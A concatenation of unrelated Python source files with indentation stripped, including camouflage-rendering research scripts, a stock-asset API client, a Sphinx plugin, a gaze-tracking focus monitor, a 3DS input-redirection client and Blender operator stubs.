im = scan.im(other_frame).copy()
mask = box.mask(scan, mesh, other_frame)
pattern = ig.load('/data/vision/billf/camo/camo/nondetect/results/textures/zebra-stripes-vector/zebra-stripes.png')
pattern = pattern.transpose([1, 0, 2])
ys, xs = np.nonzero(mask)
#cx, cy = map(int, np.mean(np.array([xs, ys]), axis = 1))
rect = ut.bbox2d(zip(xs, ys))
s = 1.02*max(float(rect[3]) / pattern.shape[0], float(rect[2]) / pattern.shape[1])
print s
pattern = ig.resize(pattern, s)
#ig.sub_img(im, rect)[:] = pattern
cx, cy = map(int, np.mean(np.array([xs, ys]), axis = 1))
ig.sub_img(im, ut.rect_centered_at(cx, cy, pattern.shape[1], pattern.shape[0]))[:] = pattern
_, texel_colors = camo.project_texels(scan, other_frame, mesh, im, geom)
texel_colors = texel_colors * np.array(lighting_colors, 'd')/255.
table.append([frame1, other_frame, mesh_render(scan, frame1, texel_colors), mesh_render(scan, frame1, lighting_colors), scan.im_with_real(frame1)])
ig.show(table)
def make_octopus_video():
vids_in = ['../results/Ovulg_Wow_sequence_Silent_RTHWatermark.mov', '../results/Octopus Vulgaris.mov']
#clips = ['../results/octo-clip1.mov', '../results/octo-clip2.mov']
clips = ['../results/octo-clip1.mov', '../results/octo-clip2.mp4']
times = ['-ss 00:00:00 -t 10', '-ss 00:05:48 -t 12.5']
# for vid, clip, time in zip(vids_in, clips, times):
# os.system('ffmpeg -i "%s" %s "%s"' % (vid, time, clip))
ut.write_lines('../results/ffmpeg-octopus-list', ['file %s' % s for s in clips])
os.system('ffmpeg -f concat -i ../results/ffmpeg-octopus-list -c copy ../results/octopus-talk.mp4')
print 'scp', '[email protected]:' + os.path.abspath('../results/octopus-talk.mp4'), '~/Dropbox/cvpr-talk/octopus-talk.mp4'
def spotlight_slides(par = 1):
scene = 'charlottesville-3'
alg = 'occlusion-wide'
scan = dset.Scan(ut.pjoin('../data/', scene))
mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'))
#texel_colors = ut.load(ut.pjoin(make_path('noloo', alg, scene), 'data.pk'))['ret'][0]
#lighting_colors = ut.load('../results/bookshelf-lighting.pk')
frame = 0
lf = 4
d = np.linalg.norm(scan.center(lf) - scan.center(lf-1))
pt = scan.center(lf) + 2.05*d*np.array([0., 1., 0]) #1.05*d*np.array([0., 1., 0]) #0.1*mesh.face_planes[-1][:3]*d
im = scan.im(lf)
#VDIR = mvg.ray_dirs(scan.K(lf), im.shape, scan.R(lf))[im.shape[0]/2, im.shape[1]/2]
texel_colors = np.zeros((mesh.ntexels, 3))
for face in xrange(6):
print np.abs(np.dot(ut.normalized(-mesh.face_center[face] + pt), ut.normalized(mesh.face_planes[face][:3])))
texel_colors[mesh.tex2juv[:, 0] == face] = 255*np.abs(np.dot(ut.normalized(-mesh.face_center[face] + pt),
ut.normalized(mesh.face_planes[face][:3])))
texel_colors *= 255/float(np.max(texel_colors))
lighting_colors = texel_colors
im = mesh.render(scan, frame, lighting_colors)
#ig.show(ig.resize(im, 0.5))
texel_colors = ut.load(ut.pjoin(make_path('noloo', alg, scene), 'data.pk'))['ret'][0]
im_colored = mesh.render(scan, frame, texel_colors)
ig.show([im, im_colored])
plane_idx = 0
url = tour.tour(scan, mesh, texel_colors, range(scan.length), plane_idx = plane_idx, par = par, start_scale = 0)
ig.show(url)
def make_occ_examples(texel_colors=None):
ut.seed_rng(0)
scene = 'walden-brush2'
if 0:
#alg = 'greedy'
#texel_colors = ut.load(ut.pjoin(make_path('noloo', alg, scene), 'data.pk'))['ret'][0]
#render_cube(scan.path, mesh, texel_colors, frame, 200, outline = True, frame_using_cube = True)
scan_fr = dset.Scan(ut.pjoin('../data', scene), max_dim = None)
mesh = box.load_from_mat(ut.pjoin(scan_fr.path, 'cube.mat'), 512)
if texel_colors is not None:
try:
texel_colors = camo.camo(scan_fr, mesh, ut.Struct(method = 'greedy'))[0]
except:
print 'exception'
ut.toplevel_locals()
if 1:
scan = dset.Scan(ut.pjoin('../data', scene))
mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'))
table = []
view_frame = 2
for frame in scan.frames:
try:
texel_colors = camo.camo(scan, mesh, ut.Struct(method = 'order', order = [frame]))[0]
table.append([frame, render_cube(scan.path, mesh, texel_colors, view_frame, 200, fullres = True, outline = False, frame_using_cube = True)])
except:
print 'exception'
ig.show(table)
return
frame = 2
im_bg = render_cube(scan_fr.path, mesh, texel_colors, frame, 200, fullres = True, outline = True, frame_using_cube = True, show_cube = False)
ig.show(im_bg)
im_nooutline = render_cube(scan_fr.path, mesh, texel_colors, frame, 200, fullres = True, outline = False, frame_using_cube = True)
im_outline = render_cube(scan_fr.path, mesh, texel_colors, frame, 200, fullres = True, outline = True, frame_using_cube = True)
ig.show([im_bg, im_nooutline, im_outline])
def make_occlusion_slide():
#scan = dset.Scan('../data/disrupt-14')
#scan = dset.Scan('../data/walden-tree1')
scan = dset.Scan('../data/mit-13', max_dim = None)
#mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'))
mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'), 1024)
# table = []
# for frame in scan.frames:
# view_frame = frame
# texel_colors = camo.camo(scan, mesh, ut.Struct(method = 'order', order = [frame]))[0]
# table.append([frame, render_cube(scan.path, mesh, texel_colors, view_frame, 200, fullres = True, outline = True, frame_using_cube = True)])
# ig.show(table)
#texel = mesh.juv2tex[2, 128, 128]
#texel = mesh.juv2tex[2, 0, 128]
#texel = mesh.juv2tex[2, 0, 128]
texel = mesh.juv2tex[5, 0, 128]
geom = camo.Geom(scan, mesh)
table = []
for frame in [0, 2, 4, 6]:#scan.frames:#[0, 1, 4]:
#table.append(scan.im(frame))
proj = scan.project(frame, mesh.texel_pts[texel])
if 1:
im_grid = draw_grid(scan.im(frame), proj, spacing = [0])
else:
im_grid = scan.im(frame)
label_valid, self_colors = camo.project_texels(scan, frame, mesh, im_grid, geom)
#im = render_cube(scan.path, mesh, self_colors, frame, 200, fullres = False, outline = True, frame_using_cube = True, occ_thresh = 2., draw_boundaries = True, im = im_grid, use_fr = False)
im_nooutline = render_cube(scan.path, mesh, self_colors, frame, 200, fullres = True, outline = False, frame_using_cube = True)
im_outline = render_cube(scan.path, mesh, self_colors, frame, 200, fullres = True, outline = True, frame_using_cube = True)
#im = render_cube(scan.path, mesh, self_colors, frame, 200, fullres = True, outline = True, frame_using_cube = True, occ_thresh = 2., draw_boundaries = True, im = im_grid, use_fr = False)
table.append([str(frame), im_outline, im_nooutline])
#table.append([str(frame), im, scan.im(frame)])
#table.append(ig.draw_pts(im, proj))
ig.show(table)
def make_capture_slide():
scene = 'mit-37'
scan = dset.Scan(ut.pjoin('../data', scene))
mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'))
if 'lighting':
lf = 13
d = np.linalg.norm(scan.center(lf) - scan.center(lf-1))
pt = scan.center(lf) + 2.05*d*np.array([0., 1., 0]) #1.05*d*np.array([0., 1., 0]) #0.1*mesh.face_planes[-1][:3]*d
#im = scan.im(lf)
#VDIR = mvg.ray_dirs(scan.K(lf), im.shape, scan.R(lf))[im.shape[0]/2, im.shape[1]/2]
texel_colors = np.zeros((mesh.ntexels, 3))
for face in xrange(6):
print np.abs(np.dot(ut.normalized(-mesh.face_center[face] + pt), ut.normalized(mesh.face_planes[face][:3])))
texel_colors[mesh.tex2juv[:, 0] == face] = 255*np.abs(np.dot(ut.normalized(-mesh.face_center[face] + pt),
ut.normalized(mesh.face_planes[face][:3])))
texel_colors *= 255/float(np.max(texel_colors))
lighting_colors = texel_colors
# geom = camo.Geom(scan, mesh)
# #texel = mesh.juv2tex[5, 128, 128]
# texel = mesh.juv2tex[2, 128, 128]
frames = [8, 10, 13, 15]
#ig.show([[mesh.render(scan, frame, lighting_colors), scan.im(frame)] for frame in frames])
f1 = 10
f2 = 14
#f2 = 8
geom = camo.Geom(scan, mesh)
label_valid, tc1 = camo.project_texels(scan, f1, mesh, scan.im(f1), geom)
label_valid, tc2 = camo.project_texels(scan, f2, mesh, scan.im(f2), geom)
tc = tc1.copy()
#ok = label_valid & (mesh.tex2juv[:, 0] == 2) & (mesh.tex2juv[:, 1] > 128)
ok = (mesh.tex2juv[:, 0] == 1) | (mesh.tex2juv[:, 0] == 5) | (mesh.tex2juv[:, 0] == 3)
ok = (mesh.tex2juv[:, 1] > 128)
tc[ok] = tc2[ok]
#ig.show(mesh.render(scan, f1, tc))
vf = f1
c1 = render_cube(scan.path, mesh, tc1, vf, 200, outline = True, frame_using_cube = True)
c2 = render_cube(scan.path, mesh, tc2, vf, 200, outline = True, frame_using_cube = True)
ch = render_cube(scan.path, mesh, tc, vf, 200, outline = True, frame_using_cube = True)
ig.show([c1, c2, ch])
return
# c1 = mesh.render(scan, vf, tc1)
# c2 = mesh.render(scan, vf, tc2)
c1 = c2 = ''
ch = mesh.render(scan, vf, tc)
ig.show([c1, c2, ch])
# def make_camo_game():
# tour.tour(scan_tour, mesh, texel_colors, frames, plane_idx = 3, im_wait = 1, n = ntour,
# mesh_occ = mesh_occ, outline_start = 0, outline_end = 1, par = par)
|
py | 1a3043e75b75a97f65b6d42f53184043eeeaec1b | import urllib3.request
import json
import datetime as dt
from urllib3 import exceptions as urlex
from Game.periodictasks.search_alarms import AlarmSearch
import pandas as pn
import numpy as np
DATE_FORMAT = '%Y-%m-%d'
def str_to_date(strdate):
"""
parses given string to date using global date format
:param strdate:
:return date:
"""
return dt.datetime.strptime(strdate, DATE_FORMAT)
class AssetComunication:
GET_ASSETS = "getAvailableAssets/"
GET_QUOTE = "getAssetMarketPrice/"
GET_HISTORY = "getAssetHistory/"
def __init__(self, url):
self.API_URL = url
self.alarm_search = AlarmSearch(acom=self)
@staticmethod
def has_quote(asset):
"""
check if an asset has a valid quote
:param asset:
:return boolean:
"""
return asset.buy != -1 and asset.sell != -1
@staticmethod
def url_to_json(url):
"""
fetch json data from given url
:param url:
:return json_response if success, 0 otherwise:
"""
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
http = urllib3.PoolManager()
try:
res = http.request('GET', url)
if res.status == 200:
return json.loads(res.data.decode())
else:
return 0
except urlex.MaxRetryError:
return 0
def get_asset_names(self):
"""
fetch from API all the available assets (only names)
:return asset list:
"""
from Game.models import Asset
url = self.API_URL + self.GET_ASSETS
json_assets = self.url_to_json(url)
asset_list = []
try:
if json_assets != 0:
json_assets = json_assets['availableAssets']
for a in json_assets:
asset = Asset(name=a['name'], type=a['type'])
asset_list.append(asset)
return asset_list
except KeyError:
# rollback
asset_list = []
finally:
return asset_list
def get_asset_quote(self, asset):
"""
given an asset (only name is required)
returns same asset with buy and sell price if both exists
also searchs for alarms for the given asset.
:param asset:
:return asset:
"""
url = self.API_URL + self.GET_QUOTE + asset.name
asset_quote = self.url_to_json(url)
try:
if asset_quote != 0:
asset.buy = asset_quote['buy']
asset.sell = asset_quote['sell']
except KeyError:
# rollback
asset.buy = -1
asset.sell = -1
finally:
self.alarm_search.search_for_alarms(asset=asset)
return asset
def get_asset_type(self, name):
assets = self.get_asset_names()
for a in assets:
if name == a.name:
return a.type
return None
def quote_for_assets(self, assets):
"""
maps asset list (only names are required) with same assets with quote
:param assets:
:return asset list:
"""
return [self.get_asset_quote(a) for a in assets if
self.has_quote(self.get_asset_quote(a))]
def get_assets(self):
"""
fetches all the available assets with their respective quotes
:return asset list:
"""
assets = self.get_asset_names()
return self.quote_for_assets(assets)
def get_asset_history(self, name, start_date, end_date):
"""
get all history for given asset
:param name:
:param start_date:
:param end_date:
:return dict [{day: DayString, sell: SELL_PRICE, buy: BUY_PRICE}]:
"""
url = (self.API_URL + self.GET_HISTORY + name + "/" +
start_date + "/" + end_date)
prices = self.url_to_json(url)
if prices == 0:
prices = {'error': True}
return prices
def average_for_asset(self, asset):
start_date = dt.date.today() - dt.timedelta(days=365 * 2)
end_date = dt.date.today()
history = self.get_asset_history(name=asset.name,
start_date=start_date
.strftime(DATE_FORMAT),
end_date=end_date
.strftime(DATE_FORMAT))
try:
prices = history['prices']
sell = [float(p['sell']) for p in prices]
sell_df = pn.DataFrame(np.array(sell))
sell_data = sell_df.quantile([0.25, 0.5, 0.75]).to_dict()[0]
sell_data['first'] = sell_data.pop(0.25)
sell_data['avg'] = sell_data.pop(0.5)
sell_data['third'] = sell_data.pop(0.75)
buy = [float(p['buy']) for p in prices]
buy_df = pn.DataFrame(np.array(buy))
buy_data = buy_df.quantile([0.25, 0.5, 0.75]).to_dict()[0]
buy_data['first'] = buy_data.pop(0.25)
buy_data['avg'] = buy_data.pop(0.5)
buy_data['third'] = buy_data.pop(0.75)
asset.prices_quantiles = {
'buy': buy_data,
'sell': sell_data,
}
return asset
except KeyError:
return
def get_assets_with_average(self):
"""
fetches all the available assets with their respective quotes
:return asset list:
"""
assets = self.get_assets()
return [self.average_for_asset(a) for a in assets if a]
|
py | 1a30459009d2c7a0caf216fdf23ac44213b2089e | """
Sphinx is hardcoded to interpret links to downloadable files relative to the root of the docs
source tree. However, the downloadable files we want to use (tarballs of our examples directories)
are themselves generated at build time, and we would therefore like them to be separate from the
source. This module is a Sphinx plugin that replaces the normal interpretation of links, causing
Sphinx to look for downloads relative to a different directory (which is set in `conf.py`).
"""
import logging
import os
import types
from typing import Any, Dict
from docutils import nodes
from sphinx import addnodes, application
from sphinx.environment.collectors import asset
from sphinx.locale import __
logger = logging.getLogger(__name__)
class DownloadExternalFileCollector(asset.DownloadFileCollector):
def process_doc(
self: asset.DownloadFileCollector, app: application.Sphinx, doctree: nodes.document
) -> None:
"""
This function is different from the original method only in doing some surgery on the paths
it finds when a separate root directory is configured.
"""
for node in doctree.traverse(addnodes.download_reference):
targetname = node["reftarget"]
if "://" in targetname:
node["refuri"] = targetname
else:
rel_filename, filename = app.env.relfn2path(targetname, app.env.docname)
if app.config.dai_downloads_root:
filename = os.path.abspath(
os.path.join(app.config.dai_downloads_root, rel_filename)
)
rel_filename = os.path.relpath(filename, app.env.srcdir)
app.env.dependencies[app.env.docname].add(rel_filename)
if not os.access(filename, os.R_OK):
logger.warning(__("download file not readable: %s") % filename)
continue
node["filename"] = app.env.dlfiles.add_file(app.env.docname, rel_filename)
def setup(app: application.Sphinx) -> Dict[str, Any]:
app.add_config_value("dai_downloads_root", None, "html")
# Disable the old instance of DownloadFileCollector and replace it with ours.
for event in app.events.listeners.values():
for listener_id, callback in list(event.items()):
if isinstance(callback, types.MethodType) and isinstance(
callback.__self__, asset.DownloadFileCollector
):
del event[listener_id]
app.add_env_collector(DownloadExternalFileCollector)
return {
"version": "0",
"parallel_read_safe": True,
"parallel_write_safe": True,
}
|
py | 1a30470af116bd430d5b4d5ce4f8e73688b844ba | # Analytics Collector
def truncate(n, decimals=0):
multiplier = 10 ** decimals
return int(n * multiplier) / multiplier
def startCam():
import cv2
from gaze_tracking import GazeTracking
import time
gaze = GazeTracking()
webcam = cv2.VideoCapture(0)
startTime = time.time()
totalFrames = 0
framesDistracted = 0
framesFocused = 0
while True:
_, frame = webcam.read()
totalFrames += 1
gaze.refresh(frame)
frame = gaze.annotated_frame()
if gaze.is_blinking():
framesDistracted += 1
elif gaze.is_right():
framesDistracted += 1
elif gaze.is_left():
framesDistracted += 1
elif gaze.is_center():
framesFocused += 1
else:
framesDistracted += 1
cv2.imshow("Camera", frame)
if cv2.waitKey(1) == ord('q'):
break
webcam.release()
cv2.destroyAllWindows()
totalTime = truncate(time.time() - startTime, 2)
percentFocused = truncate((framesFocused / totalFrames) * 100, 2)
percentDistracted = truncate((framesDistracted / totalFrames) * 100, 2)
return totalTime, percentFocused, percentDistracted
|
py | 1a30472cba36d282c6f9c892d0511320fa243516 | # Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Stateless ops for core Keras layers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.eager import context
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import gen_math_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import sparse_ops
from tensorflow.python.ops import standard_ops
# TODO(b/157913406): Expose this publicly.
def dense(inputs, kernel, bias=None, activation=None, dtype=None):
"""Densely connected NN layer op.
Arguments:
inputs: `tf.Tensor` or `tf.SparseTensor`. Inputs to operation.
kernel: `tf.Variable`. Matrix kernel.
bias: (Optional) `tf.Variable`. Bias to add to outputs.
activation: (Optional) 1-argument callable. Activation function to apply to
outputs.
dtype: (Optional) `tf.DType`. Dtype to cast `inputs` to.
Returns:
`tf.Tensor`. Output of dense connection.
"""
if dtype:
if inputs.dtype.base_dtype != dtype.base_dtype:
inputs = math_ops.cast(inputs, dtype=dtype)
rank = inputs.shape.rank
if rank == 2 or rank is None:
if isinstance(inputs, sparse_tensor.SparseTensor):
outputs = sparse_ops.sparse_tensor_dense_matmul(inputs, kernel)
else:
outputs = gen_math_ops.mat_mul(inputs, kernel)
# Broadcast kernel to inputs.
else:
outputs = standard_ops.tensordot(inputs, kernel, [[rank - 1], [0]])
# Reshape the output back to the original ndim of the input.
if not context.executing_eagerly():
shape = inputs.shape.as_list()
output_shape = shape[:-1] + [kernel.shape[-1]]
outputs.set_shape(output_shape)
if bias is not None:
outputs = nn_ops.bias_add(outputs, bias)
if activation is not None:
outputs = activation(outputs)
return outputs
|
py | 1a3047b1b855d6f0466d6d2bdfd5df486d535650 | #!/usr/bin/env python3
from tpp.tppflush import *
import sys
from math import fabs
try:
import pygame
except ImportError:
exit("Pygame required. Exiting.")
try:
from lib.controller import *
except ImportError:
joystick_name="??"
j_axis=[ ]
#buttons.py adds the following:
#joystick_name="Microsoft X-Box 360 pad"
#buttons=['B', 'A', 'Y', 'X', 'L', 'R', 'SELECT', 'START', 'Home', 'Home', 'Home']
#j_axis=[0, 1, 3, 4]
done=False
circx,circy = 160,120
deadZone=0.3 #send '0' if fabs joystick(0,1) is less than this value eg joystick_x=0.1, sends joystick_x=0.0
#Default button mapping
buttonMappings = [
HIDButtons.A,
HIDButtons.B,
HIDButtons.X,
HIDButtons.Y,
HIDButtons.SELECT, #Z
HIDButtons.R,
HIDButtons.L,
HIDButtons.START,
HIDButtons.DPADUP,
HIDButtons.DPADDOWN,
HIDButtons.DPADLEFT,
HIDButtons.DPADRIGHT
]
class KBDButtons(int):
HOME = pygame.K_HOME
POWER = pygame.K_END
#street fighter style layout on numberpad ([punches] y,x,L -> 4,5,6)
#might be useful for joy2key apps
KBbutt={
257: HIDButtons.B, #numberpad 1
258: HIDButtons.A,
259: HIDButtons.R,
260: HIDButtons.Y, #numberpad 4
261: HIDButtons.X,
262: HIDButtons.L,
256: HIDButtons.START, #numberpad 0
266: HIDButtons.SELECT, #numberpad .
273: HIDButtons.DPADUP, #arrow key up
274: HIDButtons.DPADDOWN,
276: HIDButtons.DPADLEFT,
275: HIDButtons.DPADRIGHT
}
if len(sys.argv) < 2:
#this is the pop up window
import tkinter as tk
class App:
def __init__(self, master):
frame=tk.Frame(master)
frame.pack()
#reads file lastIP to get first line
try:
f=open("lastIP","r")
last_ip=f.readline()
f.close()
except FileNotFoundError:
last_ip=" "
self.l_IP=tk.StringVar()
self.l_IP.set(last_ip)
#image banner (row 0, col 0)
lumaIMG = tk.PhotoImage(file="lib/luma.png")
lumal = tk.Label(frame,image=lumaIMG)
lumal.image = lumaIMG
lumal.grid(row=0,columnspan=3)
#places the 3 other elements (label, text box, button) on row 1
tk.Label(frame, text='IP:',font=("Courier", 22)).grid(row=1, column=0, sticky=tk.E)
tk.Entry(frame,bg='white', width=15, textvariable=self.l_IP, font=("Courier", 18)).grid(row=1,column=1, pady=10, sticky=tk.E+tk.W)
button = tk.Button(frame, text='Go', font=("Courier", 18), command=self.store)
button.grid(row=1, column=2, sticky=tk.W, pady=10)
#center label and butt
frame.grid_columnconfigure(0, weight=1)
frame.grid_columnconfigure(2, weight=1)
master.bind('<Return>', self.store ) #"enter" key
master.bind('<KP_Enter>', self.store ) # numeric "enter" key
def store(self, *args):
global IP
IP=self.l_IP.get()
f=open("lastIP","w")
f.write(IP.strip()) #stores data in text box (as string type)
f.close()
root.quit()
root= tk.Tk()
root.wm_title('3DS IP')
App(root)
root.bind('<Escape>', lambda x: quit())
root.mainloop()
root.destroy() #removes window
server = IP.strip()
else:
server = sys.argv[1]
server=LumaInputServer(server)
pygame.init()
screen = pygame.display.set_mode((320, 240))
pygame.display.set_caption('touchscreen')
botSr = pygame.image.load('lib/bottom.png')
screen.blit(botSr, (0,0))
if len(j_axis)>=6 :
pygame.draw.circle(screen, (0,0,0), (circx, circy), 5, 2)
pygame.display.update()
pygame.joystick.init()
joystick_count = pygame.joystick.get_count()
print("Number of joysticks: {}".format(joystick_count) )
if (joystick_count>0):
#Only loads one joystick if multiple are connected.
for i in range(joystick_count):
joystick = pygame.joystick.Joystick(i)
name = joystick.get_name()
if name == joystick_name:
break
joystick.init()
print("Using joystick \"{}\"".format(name))
if name == joystick_name:
buttonMappings=buttons
print("\t--> loading \"{}\" layout".format(joystick_name))
else :
print("\t(using default button layout)")
print("\t{} axes, {} buttons, {} hats".format(joystick.get_numaxes(),joystick.get_numbuttons(),joystick.get_numhats()))
for i in range(joystick.get_numaxes()):
j_axis.append(i)
else:
print("No controller found!\n\t(restricted to limited keyboard button layout)")
print("\nHOME = HOME key \nPOWER = END key\nEnd Program = ESC key")
while done==False:
#Event L O O P
for event in pygame.event.get(): # User did something
if event.type == pygame.QUIT: # If user clicked close
done=True
#Touchscreen input
if pygame.mouse.get_pressed()[0]:
pos = pygame.mouse.get_pos()
server.touch(pos[0], pos[1])
#print("THSC: ",pos[0],",",pos[1])
server.send()
elif event.type == pygame.MOUSEBUTTONUP:
server.clear_touch()
server.send()
#Keyboard Mappings
elif event.type == pygame.KEYDOWN:
if event.key == KBDButtons.HOME: #home
server.special_press(Special_Buttons.HOME)
#print("HOME")
if event.key == KBDButtons.POWER: #power
server.special_press(Special_Buttons.POWER)
#print("POWER")
if event.key == pygame.K_ESCAPE: #end program
server.clear_everything()
done = True
if event.key in KBbutt:
server.hid_press(KBbutt[event.key])
#print(event.key)
server.send()
elif event.type == pygame.KEYUP:
if event.key == KBDButtons.HOME: #home
server.special_unpress(Special_Buttons.HOME)
if event.key == KBDButtons.POWER: #power
server.special_unpress(Special_Buttons.POWER)
if event.key in KBbutt:
server.hid_unpress(KBbutt[event.key])
server.send()
# Possible joystick actions: JOYAXISMOTION JOYBALLMOTION JOYBUTTONDOWN JOYBUTTONUP JOYHATMOTION
if event.type == pygame.JOYBUTTONDOWN :
#print("Joystick {} button {} pressed.".format(event.joy,event.button))
server.press(buttonMappings[event.button])
server.send()
if event.type == pygame.JOYBUTTONUP:
#print("Joystick {} button {} released.".format(event.joy,event.button))
server.unpress(buttonMappings[event.button])
server.send()
if event.type == pygame.JOYHATMOTION:
#print("Joystick {} HATS moved to {}.".format(event.joy, event.value))
(xhat, yhat) = event.value #[-1,0,1]
if (xhat == 1):
server.press(HIDButtons.DPADRIGHT)
elif (xhat == -1):
server.press(HIDButtons.DPADLEFT)
elif (xhat == 0) :
server.unpress(HIDButtons.DPADRIGHT)
server.send()
server.unpress(HIDButtons.DPADLEFT)
if (yhat == 1):
server.press(HIDButtons.DPADUP)
elif (yhat == -1):
server.press(HIDButtons.DPADDOWN)
elif (yhat == 0) :
server.unpress(HIDButtons.DPADDOWN)
server.send()
server.unpress(HIDButtons.DPADUP)
server.send()
if event.type == pygame.JOYAXISMOTION:
#xbox:Left Thumbstick | axis 0 : L/R | axis 1 : U/D
#xbox: axis 2 : L trigger (-1:1)
#xbox: Right Thumbstick | axis 3 : L/R | axis 4 : U/D
#xbox: axis 5 : R trigger (-1:1)
#if event.axis == 0: print("Joystick {} axis {} moved to {}.".format(event.joy,event.axis, event.value))
if event.axis == j_axis[0] :
if fabs(event.value)>deadZone:
server.circle_pad_coords[0] = int(32767*event.value) #left_joy_x
else:
#note: circle_pad_neutral() == circle_pad_coords = [0,0] (that is both X and Y coords are set to zero)
server.circle_pad_coords[0] = int(0) #left_joy_x
server.send()
if event.axis==j_axis[1] :
if fabs(event.value)>deadZone:
server.circle_pad_coords[1] = int(-32767*event.value) #left_joy_y
else:
server.circle_pad_coords[1] = int(0) #left_joy_y
server.send()
#using the right trigger to touch the screen only works if you have a right trigger and right thumbstick
if len(j_axis)>=6:
if (event.axis in [j_axis[2], j_axis[3],j_axis[5]]): #r trig = mouse click
(circx, circy)=(160+int(159*joystick.get_axis(j_axis[2])),120+int(119*joystick.get_axis(j_axis[3])))
#draw location of touch point but only when joystick moves
screen.blit(botSr, (0,0))
pygame.draw.circle(screen, (0,0,0), (circx, circy), 5, 2)
pygame.display.update()
if (joystick.get_axis(j_axis[5])>0.0): #Want to be able to "drag"
server.touch(circx,circy)
server.send()
pygame.draw.circle(screen, (255,255,255), (circx, circy), 3, 0)
pygame.display.update()
if event.axis == j_axis[5]: #r trig
if event.value < 0: #less than half depression #notme_irl
server.clear_touch()
server.send()
print("\nClearing everything and closing program")
server.clear_everything()
pygame.quit()
|
py | 1a30485ecd28afd50049a68d6a991861e5e272c5 | # coding: utf-8
"""
Isilon SDK
Isilon SDK - Language bindings for the OneFS API # noqa: E501
OpenAPI spec version: 4
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import isi_sdk_8_0_1
from isi_sdk_8_0_1.models.drives_drive_firmware_node_drive import DrivesDriveFirmwareNodeDrive # noqa: E501
from isi_sdk_8_0_1.rest import ApiException
class TestDrivesDriveFirmwareNodeDrive(unittest.TestCase):
"""DrivesDriveFirmwareNodeDrive unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testDrivesDriveFirmwareNodeDrive(self):
"""Test DrivesDriveFirmwareNodeDrive"""
# FIXME: construct object with mandatory attributes with example values
# model = isi_sdk_8_0_1.models.drives_drive_firmware_node_drive.DrivesDriveFirmwareNodeDrive() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
|
py | 1a3048e8e169005c6280a5415dd78b0a24347b37 | import sys
import typing
def average_normals(average_type: typing.Union[int, str] = 'CUSTOM_NORMAL',
weight: int = 50,
threshold: float = 0.01):
'''Average custom normals of selected vertices
:param average_type: Type, Averaging methodCUSTOM_NORMAL Custom Normal, Take Average of vert Normals.FACE_AREA Face Area, Set all vert normals by Face Area.CORNER_ANGLE Corner Angle, Set all vert normals by Corner Angle.
:type average_type: typing.Union[int, str]
:param weight: Weight, Weight applied per face
:type weight: int
:param threshold: Threshold, Threshold value for different weights to be considered equal
:type threshold: float
'''
pass
def beautify_fill(angle_limit: float = 3.14159):
'''Rearrange some faces to try to get less degenerated geometry
:param angle_limit: Max Angle, Angle limit
:type angle_limit: float
'''
pass
def bevel(offset_type: typing.Union[int, str] = 'OFFSET',
offset: float = 0.0,
offset_pct: float = 0.0,
segments: int = 1,
profile: float = 0.5,
vertex_only: bool = False,
clamp_overlap: bool = False,
loop_slide: bool = True,
mark_seam: bool = False,
mark_sharp: bool = False,
material: int = -1,
harden_normals: bool = False,
face_strength_mode: typing.Union[int, str] = 'NONE',
miter_outer: typing.Union[int, str] = 'SHARP',
miter_inner: typing.Union[int, str] = 'SHARP',
spread: float = 0.1,
release_confirm: bool = False):
'''Cut into selected items at an angle to create flat or rounded bevel or chamfer
:param offset_type: Width Type, What distance Width measuresOFFSET Offset, Amount is offset of new edges from original.WIDTH Width, Amount is width of new face.DEPTH Depth, Amount is perpendicular distance from original edge to bevel face.PERCENT Percent, Amount is percent of adjacent edge length.
:type offset_type: typing.Union[int, str]
:param offset: Width, Bevel amount
:type offset: float
:param offset_pct: Width Percent, Bevel amount for percentage method
:type offset_pct: float
:param segments: Segments, Segments for curved edge
:type segments: int
:param profile: Profile, Controls profile shape (0.5 = round)
:type profile: float
:param vertex_only: Vertex Only, Bevel only vertices
:type vertex_only: bool
:param clamp_overlap: Clamp Overlap, Do not allow beveled edges/vertices to overlap each other
:type clamp_overlap: bool
:param loop_slide: Loop Slide, Prefer slide along edge to even widths
:type loop_slide: bool
:param mark_seam: Mark Seams, Mark Seams along beveled edges
:type mark_seam: bool
:param mark_sharp: Mark Sharp, Mark beveled edges as sharp
:type mark_sharp: bool
:param material: Material, Material for bevel faces (-1 means use adjacent faces)
:type material: int
:param harden_normals: Harden Normals, Match normals of new faces to adjacent faces
:type harden_normals: bool
:param face_strength_mode: Face Strength Mode, Whether to set face strength, and which faces to set face strength onNONE None, Do not set face strength.NEW New, Set face strength on new faces only.AFFECTED Affected, Set face strength on new and modified faces only.ALL All, Set face strength on all faces.
:type face_strength_mode: typing.Union[int, str]
:param miter_outer: Outer Miter, Pattern to use for outside of mitersSHARP Sharp, Outside of miter is sharp.PATCH Patch, Outside of miter is squared-off patch.ARC Arc, Outside of miter is arc.
:type miter_outer: typing.Union[int, str]
:param miter_inner: Inner Miter, Pattern to use for inside of mitersSHARP Sharp, Inside of miter is sharp.ARC Arc, Inside of miter is arc.
:type miter_inner: typing.Union[int, str]
:param spread: Spread, Amount to spread arcs for arc inner miters
:type spread: float
:param release_confirm: Confirm on Release
:type release_confirm: bool
'''
pass
def bisect(plane_co: float = (0.0, 0.0, 0.0),
plane_no: float = (0.0, 0.0, 0.0),
use_fill: bool = False,
clear_inner: bool = False,
clear_outer: bool = False,
threshold: float = 0.0001,
xstart: int = 0,
